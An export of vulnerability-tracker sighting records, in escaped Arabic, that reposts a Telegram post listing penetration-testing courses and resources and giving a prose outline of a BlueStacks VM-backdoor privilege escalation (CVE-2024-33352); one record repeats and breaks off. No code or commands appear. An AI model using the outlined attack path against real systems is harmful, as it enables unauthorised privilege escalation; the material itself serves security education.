\u0627\u0644\u0636\u0639\u064a\u0641\u0629 (Vulnerable method):\n\u0644\u0646\u0641\u062a\u0631\u0636 \u0623\u0646 \u0644\u062f\u064a\u0646\u0627 \u0637\u0631\u064a\u0642\u0629 \u0641\u064a \u0627\u0644\u0643\u0648\u062f \u062a\u0639\u0631\u0636 \u0645\u062f\u062e\u0644\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0645\u0628\u0627\u0634\u0631\u0629 \u0641\u064a \u0635\u0641\u062d\u0629 HTML \u062f\u0648\u0646 \u062a\u0646\u0642\u064a\u0629:", "creation_timestamp": "2024-12-13T19:00:22.000000Z"} https://vulnerability.circl.lu/sighting/51ca8f8b-aeb4-43c0-b549-e8a1f5fad200/export Fri, 13 Dec 2024 19:00:22 +0000 https://vulnerability.circl.lu/sighting/8454b4dd-4ecc-4d1a-8559-383b31fe5e09/export {"uuid": "8454b4dd-4ecc-4d1a-8559-383b31fe5e09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1612", "content": "2. \u062f\u0648\u0631\u0629 \u0623\u0645\u0646 \u0627\u0644\u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0648\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642:\n - \u0645\u0646\u0635\u0629: \u0631\u0648\u0627\u0642\n - \u062a\u062a\u0636\u0645\u0646 \u0627\u0644\u062f\u0648\u0631\u0629 \u0634\u0631\u062d\u0627\u064b \u0644\u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0627\u0644\u062a\u0639\u0627\u0645\u0644 \u0645\u0639\u0647\u0627.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.rwaq.org/courses/information-security-and-penetration-testing)\n\n3. \u062f\u0648\u0631\u0629 \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a \u0645\u0646 \u0627\u0644\u0635\u0641\u0631 \u0625\u0644\u0649 \u0627\u0644\u0627\u062d\u062a\u0631\u0627\u0641:\n - \u0645\u0646\u0635\u0629: Udemy\n - \u062a\u0631\u0643\u0632 \u0639\u0644\u0649 \u062a\u0642\u0646\u064a\u0627\u062a \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0623\u062f\u0648\u0627\u062a \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.udemy.com/course/ethical-hacking-arabic/)\n\n### \u062f\u0648\u0631\u0627\u062a \u0628\u0627\u0644\u0644\u063a\u0629 \u0627\u0644\u0625\u0646\u062c\u0644\u064a\u0632\u064a\u0629:\n\n1. Web Application Security Testing with OWASP ZAP:\n - \u0645\u0646\u0635\u0629: Coursera\n - \u062a\u0639\u0644\u0645 \u0643\u064a\u0641\u064a\u0629 \u0627\u062e\u062a\u0628\u0627\u0631 \u0623\u0645\u0646 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u062f\u0627\u0629 OWASP ZAP.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.coursera.org/learn/web-application-security-testing-owasp-zap)\n\n2. Ethical Hacking: System Hacking:\n - \u0645\u0646\u0635\u0629: LinkedIn Learning\n - \u062a\u0639\u0644\u0645 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0628\u0634\u0643\u0644 \u0622\u0645\u0646.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.linkedin.com/learning/ethical-hacking-system-hacking)\n\n3. Penetration Testing and Ethical Hacking:\n - \u0645\u0646\u0635\u0629: Pluralsight\n - \u062f\u0648\u0631\u0629 \u0634\u0627\u0645\u0644\u0629 \u062a\u063a\u0637\u064a \u062a\u0642\u0646\u064a\u0627\u062a \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.pluralsight.com/courses/penetration-testing-ethical-hacking)\n\n4. Web Application Security for Absolute Beginners:\n - \u0645\u0646\u0635\u0629: Udemy\n - \u062f\u0648\u0631\u0629 \u0645\u0648\u062c\u0647\u0629 \u0644\u0644\u0645\u0628\u062a\u062f\u0626\u064a\u0646 \u062a\u062a\u0646\u0627\u0648\u0644 \u0623\u0633\u0627\u0633\u064a\u0627\u062a \u0623\u0645\u0646 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0648\u0643\u064a\u0641\u064a\u0629 \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0645\u0648\u0627\u0642\u0639 \u0645\u0646 \u0627\u0644\u0647\u062c\u0645\u0627\u062a.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.udemy.com/course/web-application-security-for-absolute-beginners/)\n\n### \u0645\u0635\u0627\u062f\u0631 \u0625\u0636\u0627\u0641\u064a\u0629:\n\n- OWASP (Open Web Application Security Project):\n - \u0645\u0634\u0631\u0648\u0639 \u0645\u0641\u062a\u0648\u062d \u0627\u0644\u0645\u0635\u062f\u0631 \u064a\u0631\u0643\u0632 \u0639\u0644\u0649 \u062a\u062d\u0633\u064a\u0646 \u0623\u0645\u0627\u0646 \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a. \u064a\u0648\u0641\u0631 \u0642\u0648\u0627\u0626\u0645 \u0648\u062b\u0627\u0626\u0642\u064a\u0629 \u0648\u0623\u062f\u0648\u0627\u062a \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0648\u0642\u0639](https://owasp.org/)\n\n- Hack The Box:\n - \u0645\u0646\u0635\u0629 \u062a\u0641\u0627\u0639\u0644\u064a\u0629 \u062a\u0648\u0641\u0631 \u0628\u064a\u0626\u0629 \u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0641\u064a \u0623\u0646\u0638\u0645\u0629 \u062d\u0642\u064a\u0642\u064a\u0629.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0648\u0642\u0639](https://www.hackthebox.com/)\n\n- SecurityTube:\n - \u0645\u0643\u062a\u0628\u0629 \u0641\u064a\u062f\u064a\u0648\u0647\u0627\u062a \u062a\u0639\u0644\u064a\u0645\u064a\u0629 \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 \u0627\u0644\u062f\u0631\u0648\u0633 \u0648\u0627\u0644\u0645\u062d\u0627\u0636\u0631\u0627\u062a \u062d\u0648\u0644 \u0623\u0645\u0646 \u0627\u0644\u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0648\u0642\u0639](http://www.securitytube.net/)\n\n- \u0643\u062a\u0627\u0628 \"The Web Application Hacker's Handbook\":\n - \u0643\u062a\u0627\u0628 \u0645\u0645\u064a\u0632 \u064a\u062a\u0646\u0627\u0648\u0644 \u0628\u0627\u0644\u062a\u0641\u0635\u064a\u0644 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0648\u064a\u0628 \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0643\u062a\u0627\u0628 \u0639\u0644\u0649 \u0623\u0645\u0627\u0632\u0648\u0646](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470)\n\nThe Smart Shadow:\n\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u064a BlueStacks (\u0645\u062d\u0627\u0643\u064a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f) \u0648\u0627\u0644\u062a\u064a \u062a\u0639\u062a\u0645\u062f \u0639\u0644\u0649 \u0627\u0644\u062a\u0633\u0644\u0644 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (CVE-2024-33352) \n\n---\n\n\u0634\u0631\u062d \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u0641\u064a BlueStacks\n\n\u0645\u0642\u062f\u0645\u0629:\nBlueStacks \u0647\u0648 \u0645\u062d\u0627\u0643\u064a \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u064a\u0633\u062a\u062e\u062f\u0645 \u0644\u062a\u0634\u063a\u064a\u0644 \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631. \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u062e\u0637\u064a\u0631\u0629 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062d\u0627\u0643\u064a \u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0639\u0628\u0631 \u0627\u0644\u062a\u0633\u0644\u0644 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.\n\n\u0645\u0627 \u0647\u064a \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352\u061f\n\nCVE-2024-33352 \u0647\u064a \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0641\u064a BlueStacks\u060c \u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a (Privilege Escalation) \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (VM backdooring). \u0647\u0630\u0627 \u064a\u0639\u0646\u064a \u0623\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u064a\u0645\u0643\u0646\u0647 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0639\u0644\u0649 \u0645\u0645\u0627 \u0647\u0648 \u0645\u0633\u0645\u0648\u062d \u0644\u0647\u060c \u0645\u0645\u0627 \u064a\u0645\u0643\u0646\u0647 \u0645\u0646 \u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0623\u0648 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629.\n\n\u0643\u064a\u0641 \u062a\u0639\u0645\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629\u061f\n\n1. \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (VM backdooring):\n - \u062a\u0633\u062a\u062e\u062f\u0645 BlueStacks \u062a\u0642\u0646\u064a\u0629 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0644\u062a\u0634\u063a\u064a\u0644 \u0646\u0638\u0627\u0645 \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631. \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0647\u0630\u0647 \u0627\u0644\u0628\u064a\u0626\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0644\u0625\u062f\u062e\u0627\u0644 \u0643\u0648\u062f \u0636\u0627\u0631 (malicious code) \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.\n \n2. \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a (Privilege Escalation):\n - \u0628\u0639\u062f \u0625\u062f\u062e\u0627\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631\u060c \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u062a\u0635\u0639\u064a\u062f \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a\u0647 \u062f\u0627\u062e\u0644 \u0627\u0644\u0646\u0638\u0627\u0645. \u0647\u0630\u0627 \u064a\u0639\u0646\u064a \u0623\u0646\u0647 \u064a\u0645\u0643\u0646\u0647 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0639\u0644\u0649 \u0645\u062b\u0644 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u062f\u064a\u0631 (Administrator privileges)\u060c \u0645\u0645\u0627 \u064a\u062a\u064a\u062d \u0644\u0647 \u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0623\u0648 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u062d\u0633\u0627\u0633\u0629.\n\n\u0645\u062b\u0627\u0644 \u0639\u0645\u0644\u064a:\n\n\u0644\u0646\u0641\u062a\u0631\u0636 \u0623\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0644\u062f\u064a\u0647 \u0648\u0635\u0648\u0644 \u0645\u062d\u062f\u0648\u062f \u0625\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631 \u0627\u0644\u0630\u064a \u064a\u0639\u0645\u0644 \u0639\u0644\u064a\u0647 BlueStacks. \u064a\u0645\u0643\u0646\u0647 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u0628\u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u062a\u0627\u0644\u064a\u0629:\n\n1. \u0625\u062f\u062e\u0627\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631:\n - \u064a\u0642\u0648\u0645 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0625\u062f\u062e\u0627\u0644 \u0643\u0648\u062f \u0636\u0627\u0631 \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0644\u0640 BlueStacks. \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u062d\u062f\u062b \u0630\u0644\u0643 \u0645\u0646 \u062e\u0644\u0627\u0644 \u062a\u0646\u0632\u064a\u0644 \u062a\u0637\u0628\u064a\u0642 \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0636\u0627\u0631 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u062e\u0628\u064a\u062b.\n\n2. \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631:\n - \u0639\u0646\u062f \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u0636\u0627\u0631 \u062f\u0627\u062e\u0644 BlueStacks\u060c \u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631 \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.", "creation_timestamp": "2024-12-13T19:00:22.000000Z"} {"uuid": "8454b4dd-4ecc-4d1a-8559-383b31fe5e09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1612", "content": "2. \u062f\u0648\u0631\u0629 \u0623\u0645\u0646 \u0627\u0644\u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0648\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642:\n - \u0645\u0646\u0635\u0629: \u0631\u0648\u0627\u0642\n - \u062a\u062a\u0636\u0645\u0646 \u0627\u0644\u062f\u0648\u0631\u0629 \u0634\u0631\u062d\u0627\u064b \u0644\u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0627\u0644\u062a\u0639\u0627\u0645\u0644 \u0645\u0639\u0647\u0627.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.rwaq.org/courses/information-security-and-penetration-testing)\n\n3. \u062f\u0648\u0631\u0629 \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a \u0645\u0646 \u0627\u0644\u0635\u0641\u0631 \u0625\u0644\u0649 \u0627\u0644\u0627\u062d\u062a\u0631\u0627\u0641:\n - \u0645\u0646\u0635\u0629: Udemy\n - \u062a\u0631\u0643\u0632 \u0639\u0644\u0649 \u062a\u0642\u0646\u064a\u0627\u062a \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0623\u062f\u0648\u0627\u062a \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.udemy.com/course/ethical-hacking-arabic/)\n\n### \u062f\u0648\u0631\u0627\u062a \u0628\u0627\u0644\u0644\u063a\u0629 \u0627\u0644\u0625\u0646\u062c\u0644\u064a\u0632\u064a\u0629:\n\n1. Web Application Security Testing with OWASP ZAP:\n - \u0645\u0646\u0635\u0629: Coursera\n - \u062a\u0639\u0644\u0645 \u0643\u064a\u0641\u064a\u0629 \u0627\u062e\u062a\u0628\u0627\u0631 \u0623\u0645\u0646 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u062f\u0627\u0629 OWASP ZAP.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.coursera.org/learn/web-application-security-testing-owasp-zap)\n\n2. Ethical Hacking: System Hacking:\n - \u0645\u0646\u0635\u0629: LinkedIn Learning\n - \u062a\u0639\u0644\u0645 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0628\u0634\u0643\u0644 \u0622\u0645\u0646.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.linkedin.com/learning/ethical-hacking-system-hacking)\n\n3. Penetration Testing and Ethical Hacking:\n - \u0645\u0646\u0635\u0629: Pluralsight\n - \u062f\u0648\u0631\u0629 \u0634\u0627\u0645\u0644\u0629 \u062a\u063a\u0637\u064a \u062a\u0642\u0646\u064a\u0627\u062a \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.pluralsight.com/courses/penetration-testing-ethical-hacking)\n\n4. Web Application Security for Absolute Beginners:\n - \u0645\u0646\u0635\u0629: Udemy\n - \u062f\u0648\u0631\u0629 \u0645\u0648\u062c\u0647\u0629 \u0644\u0644\u0645\u0628\u062a\u062f\u0626\u064a\u0646 \u062a\u062a\u0646\u0627\u0648\u0644 \u0623\u0633\u0627\u0633\u064a\u0627\u062a \u0623\u0645\u0646 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0648\u0643\u064a\u0641\u064a\u0629 \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0645\u0648\u0627\u0642\u0639 \u0645\u0646 \u0627\u0644\u0647\u062c\u0645\u0627\u062a.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.udemy.com/course/web-application-security-for-absolute-beginners/)\n\n### \u0645\u0635\u0627\u062f\u0631 \u0625\u0636\u0627\u0641\u064a\u0629:\n\n- OWASP (Open Web Application Security Project):\n - \u0645\u0634\u0631\u0648\u0639 \u0645\u0641\u062a\u0648\u062d \u0627\u0644\u0645\u0635\u062f\u0631 \u064a\u0631\u0643\u0632 \u0639\u0644\u0649 \u062a\u062d\u0633\u064a\u0646 \u0623\u0645\u0627\u0646 \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a. \u064a\u0648\u0641\u0631 \u0642\u0648\u0627\u0626\u0645 \u0648\u062b\u0627\u0626\u0642\u064a\u0629 \u0648\u0623\u062f\u0648\u0627\u062a \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0648\u0642\u0639](https://owasp.org/)\n\n- Hack The Box:\n - \u0645\u0646\u0635\u0629 \u062a\u0641\u0627\u0639\u0644\u064a\u0629 \u062a\u0648\u0641\u0631 \u0628\u064a\u0626\u0629 \u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0641\u064a \u0623\u0646\u0638\u0645\u0629 \u062d\u0642\u064a\u0642\u064a\u0629.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0648\u0642\u0639](https://www.hackthebox.com/)\n\n- SecurityTube:\n - \u0645\u0643\u062a\u0628\u0629 \u0641\u064a\u062f\u064a\u0648\u0647\u0627\u062a \u062a\u0639\u0644\u064a\u0645\u064a\u0629 \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 \u0627\u0644\u062f\u0631\u0648\u0633 \u0648\u0627\u0644\u0645\u062d\u0627\u0636\u0631\u0627\u062a \u062d\u0648\u0644 \u0623\u0645\u0646 \u0627\u0644\u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0648\u0642\u0639](http://www.securitytube.net/)\n\n- \u0643\u062a\u0627\u0628 \"The Web Application Hacker's Handbook\":\n - \u0643\u062a\u0627\u0628 \u0645\u0645\u064a\u0632 \u064a\u062a\u0646\u0627\u0648\u0644 \u0628\u0627\u0644\u062a\u0641\u0635\u064a\u0644 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0648\u064a\u0628 \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627.\n - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0643\u062a\u0627\u0628 \u0639\u0644\u0649 \u0623\u0645\u0627\u0632\u0648\u0646](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470)\n\nThe Smart Shadow:\n\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u064a BlueStacks (\u0645\u062d\u0627\u0643\u064a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f) \u0648\u0627\u0644\u062a\u064a \u062a\u0639\u062a\u0645\u062f \u0639\u0644\u0649 \u0627\u0644\u062a\u0633\u0644\u0644 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (CVE-2024-33352) \n\n---\n\n\u0634\u0631\u062d \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u0641\u064a BlueStacks\n\n\u0645\u0642\u062f\u0645\u0629:\nBlueStacks \u0647\u0648 \u0645\u062d\u0627\u0643\u064a \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u064a\u0633\u062a\u062e\u062f\u0645 \u0644\u062a\u0634\u063a\u064a\u0644 \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631. \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u062b\u063a\u0631\u0629 